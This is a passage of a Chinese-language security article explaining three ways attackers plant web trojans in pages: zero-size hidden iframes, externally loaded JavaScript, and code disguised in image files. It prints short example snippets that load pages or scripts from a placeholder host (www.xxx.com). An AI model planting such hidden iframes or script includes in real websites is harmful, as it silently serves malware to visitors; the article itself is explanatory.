3、揭秘几种最主要的挂马技术　　(1).iframe式挂马
　　网页木马被攻击者利用iframe语句，加载到任意网页中都可执行的挂马形式，是最早也是最有效的的一种网络挂马技术。通常的挂马代码如下：

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

　　解释：在打开插入该句代码的网页后，就也就打开了http://www.xxx.com/muma.html页面，但是由于它的长和宽都为“0”，所以很难察觉，非常具有隐蔽性。下面我们做过做个演示，比如在某网页中插入如下代码：  

<iframe src=http://security.ctocio.com.cn width=200 height=200></iframe>

　　在“百度”中嵌入了“IT专家网安全版块”的页面，效果如图2。

　　(2).js脚本挂马
　　js挂马是一种利用js脚本文件调用的原理进行的网页木马隐蔽挂马技术，如：黑客先制作一个.js文件，然后利用js代码调用到挂马的网页。通常代码如下：

<script language=javascript src=http://www.xxx.com/gm.js></script>

　　http://www.xxx.com/gm.js就是一个js脚本文件，通过它调用和执行木马的服务端。这些js文件一般都可以通过工具生成，攻击者只需输入相关的选项就可以了，如图3就是一个JS木马的代码。(图3)

　　(3).图片伪装挂马
　　随着防毒技术的发展，黑手段也不停地更新，图片木马技术逃避杀毒监视的新技术，攻击者将类似：http://www.xxx.com/test.htm中的木马代码植入到test.gif图片文件中，这些嵌入代码的图片都可以用工具生成，攻击者只需输入相关的选项就可以了，如图4。图片木马生成后，再利用代码调用执行，是比较新颖的一种挂马隐蔽方法，实例代码如：

<html> <iframe src="http://www.xxx.com/test.htm" height=0 width=0> </iframe> <img src="http://www.xxx.com/test.jpg"></center> </html>

　　注：当用户打开http://www.xxx.com/test.htm是，显示给用户的是**，而http://www.xxx.com/test.htm网页代码也随之运行。(图4)